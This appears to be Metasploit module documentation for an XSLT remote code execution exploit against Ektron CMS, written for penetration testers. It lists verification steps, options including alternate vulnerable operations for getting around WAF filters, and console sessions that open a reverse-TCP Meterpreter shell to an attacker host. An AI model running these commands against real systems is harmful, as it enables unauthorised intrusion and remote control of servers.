## Vulnerable Application

  [Ektron Content Management System (CMS)](http://www.episerver.com/cms/ektron/) 8.0, 8.5, and 8.7 before 8.7sp2 and 9.0 before sp1 (according to CVE-2015-0923)

  Ektron has been acquired by Epi Server and finding installers may prove difficult.

## Verification Steps

   But if you can build a test network the following may be used to verify:

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/windows/http/ektron_xslt_exec_ws```
  4. Do: ```set RHOST [target ip]```
  5. Do: ```check```
  6. You should receive a target vulnerable message.
  7. Do: ```exploit```
  8. You should get a shell.

  In our experience testing against 64 bit hosts should still pass the 'check' in step 6 and return a target vulnerable message. But when injecting shellcode into a new thread it may require the tester to adjust the payload as well. This may be done as follows:

  1. Do ```set PAYLOAD windows/x64/meterpreter```

## Options

  These are important but perhaps less-used options. There are quite a few other 'web' options available which will not be discussed due to their generality.

### TARGETOP

  There are multiple operations which are vulnerable to this XSLT bug. We have enumerated more (likely all) of the operations in ServerControlWS.asmx and provide testers with the ability to test the additional operations by setting this option to one of the following: ContentBlockEx, GetContentFlaggingString,GetMessagingString, GetBookmarkString, GetContentRatingString

  This value defaults to ContentBlockEx (from the original reports). Testers may find adjusting this value useful if defenders have included Web Application Firewall (WAF) rules to specifically filter ContentBlockEx as a mitigation in lieu of updating.

### TARGETURI

  This allows the tester to adjust the base-installation path. The default value is '/cms400min' but in our experience many deployments are simply the root path '/'.

## Scenarios

  Checking if a target is vulnerable.

  ```
  msf > use exploit/windows/http/ektron_xslt_exec_ws
  msf exploit(ektron_xslt_exec_ws) > set RHOST 192.168.1.175
  RHOST => 192.168.1.175
  msf exploit(ektron_xslt_exec_ws) > check
  [+] 192.168.1.175:80 The target is vulnerable
  msf exploit(ektron_xslt_exec_ws) >
  ```

  Exploiting a Win7 x64 installation to obtain shell.

  ```
  msf > use exploit/windows/http/ektron_xslt_exec_ws
  msf exploit(ektron_xslt_exec_ws) > set RHOST 192.168.1.175
  RHOST => 192.168.1.175
  msf exploit(ektron_xslt_exec_ws) > check
  [+] 192.168.1.175:80 The target is vulnerable.
  msf exploit(ektron_xslt_exec_ws) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
  PAYLOAD => windows/x64/meterpreter/reverse_tcp
  msf exploit(ektron_xslt_exec_ws) > set LHOST 192.168.1.50
  LHOST => 192.168.1.50
  msf exploit(ektron_xslt_exec_ws) > exploit
  [*] Started reverse TCP handler on 192.168.1.50:4444
  [*] Generating the EXE Payload and the XSLT...
  [*] Trying to run the xslt transformation...
  [+] Exploitation was successful
  [*] Sending stage (1189423 bytes) to 192.168.1.175
  [*] Meterpreter session 1 opened (192.168.1.50:4444 -> 192.168.1.175:49169) at 2016-10-30 04:36:50 +0000

  meterpreter >
  ```
